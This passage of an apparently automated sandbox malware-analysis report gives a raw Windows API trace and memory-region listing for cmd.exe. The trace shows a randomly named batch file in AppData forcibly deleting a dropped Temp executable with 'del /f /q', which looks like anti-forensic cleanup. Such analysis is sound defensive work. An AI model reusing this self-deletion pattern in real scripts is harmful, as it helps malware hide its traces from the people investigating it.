lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0111.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.979] GetFileType (hFile=0x7) returned 0x2 [0111.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) returned 1 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x22f450*=0x3) returned 1 [0111.980] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" ") returned 58 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] GetFileType (hFile=0x7) returned 0x2 [0111.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x3a) returned 1 [0111.980] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0111.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.980] GetFileType (hFile=0x7) returned 0x2 [0111.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.981] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0111.981] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.981] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0111.981] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0111.981] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0111.981] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0111.981] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.981] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eda4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.981] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22de34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.981] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e068, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0111.982] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x2020 [0111.982] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x422148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.982] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.982] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x2020 [0111.982] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0x410aa8 [0111.982] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 1 [0111.983] FindNextFileW (in: hFindFile=0x410aa8, lpFindFileData=0x430554 | out: lpFindFileData=0x430554) returned 0 [0111.983] GetLastError () returned 0x12 [0111.983] FindClose (in: hFindFile=0x410aa8 | out: hFindFile=0x410aa8) returned 1 [0111.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.984] SetConsoleInputExeNameW () returned 0x1 [0111.984] GetConsoleOutputCP () returned 0x1b5 [0111.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.984] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.984] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.984] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.984] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0111.985] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x3e, lpOverlapped=0x0) returned 1 [0111.985] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n") returned 62 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] GetFileType (hFile=0x54) returned 0x1 [0111.985] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.985] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.986] _tell (_FileHandle=3) returned 145 [0111.986] _close (_FileHandle=3) returned 0 [0111.986] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f1dc | out: _Buffer="\r\n") returned 2 [0111.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.986] GetFileType (hFile=0x7) returned 0x2 [0111.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.986] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f19c | out: lpMode=0x22f19c) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f1c8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f1c8*=0x2) returned 1 [0111.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.987] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f1d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0111.987] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f1d8 | out: _Buffer=">") returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] GetFileType (hFile=0x7) returned 0x2 [0111.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.987] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f1a0 | out: lpMode=0x22f1a0) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f1cc, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x22f1cc*=0x19) returned 1 [0111.987] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.987] GetFileType (hFile=0x7) returned 0x2 [0111.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f424 | out: lpMode=0x22f424) returned 1 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f450, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x22f450*=0x3) returned 1 [0111.988] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f45c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" ") returned 58 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] GetFileType (hFile=0x7) returned 0x2 [0111.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f41c | out: lpMode=0x22f41c) returned 1 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f448, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f448*=0x3a) returned 1 [0111.988] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f47c | out: _Buffer="\r\n") returned 2 [0111.988] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.988] GetFileType (hFile=0x7) returned 0x2 [0111.988] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.988] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f43c | out: lpMode=0x22f43c) returned 1 [0111.989] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.989] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22f468*=0x2) returned 1 [0111.989] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0111.989] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0111.989] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0111.989] GetConsoleTitleW (in: lpConsoleTitle=0x22efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.989] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eda4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.989] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22de34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.989] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e068, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e064*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0111.989] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0111.989] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.989] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0xffffffff [0111.989] GetLastError () returned 0x2 [0111.990] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x422148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0111.990] _wcsicmp (_String1="Wtsk8WxH.exe", _String2=".") returned 73 [0111.990] _wcsicmp (_String1="Wtsk8WxH.exe", _String2="..") returned 73 [0111.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0xffffffff [0111.990] GetLastError () returned 0x2 [0111.990] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0xffffffff [0111.990] GetLastError () returned 0x2 [0111.990] _get_osfhandle (_FileHandle=2) returned 0xb [0111.990] GetFileType (hFile=0xb) returned 0x2 [0111.990] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.990] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ea64 | out: lpMode=0x22ea64) returned 1 [0111.990] _get_osfhandle (_FileHandle=2) returned 0xb [0111.990] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22ea98 | out: lpConsoleScreenBufferInfo=0x22ea98) returned 1 [0111.991] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0111.991] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.991] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.991] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.991] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.991] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.991] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.992] SetConsoleInputExeNameW () returned 0x1 [0111.992] GetConsoleOutputCP () returned 0x1b5 [0111.992] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.992] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.992] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f424, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.992] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.992] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f408, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f408*=0x0, lpOverlapped=0x0) returned 1 [0111.992] GetLastError () returned 0x0 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] GetFileType (hFile=0x54) returned 0x1 [0111.992] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.992] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f3ec, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x22f3ec*=0x0, lpOverlapped=0x0) returned 1 [0111.993] GetLastError () returned 0x0 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] GetFileType (hFile=0x54) returned 0x1 [0111.993] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.993] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0111.993] longjmp () [0111.993] _tell (_FileHandle=3) returned 145 [0111.993] _close (_FileHandle=3) returned 0 [0111.993] CmdBatNotification () returned 0x0 [0111.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.993] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.993] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.993] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.993] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.993] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.994] SetConsoleInputExeNameW () returned 0x1 [0111.994] GetConsoleOutputCP () returned 0x1b5 [0111.994] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.994] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.994] exit (_Code=0) Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xcc0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5511 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5512 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5513 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5514 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5515 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 5516 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5517 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5518 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5519 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5520 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5688 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5689 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5690 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5691 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 5692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5693 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5694 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5695 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5696 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5697 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5698 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5699 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5700 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5701 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5702 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5703 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5704 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5705 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5706 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5707 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 5708 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 5709 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 5738 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5739 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5741 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5742 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 58 os_tid = 0xcf0 [0109.420] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc9c | out: lpSystemTimeAsFileTime=0x28fc9c*(dwLowDateTime=0x7f39bcc0, dwHighDateTime=0x1d440a9)) [0109.420] GetCurrentProcessId () returned 0xcec [0109.420] GetCurrentThreadId () returned 0xcf0 [0109.420] GetTickCount () returned 0x26306 [0109.421] QueryPerformanceCounter 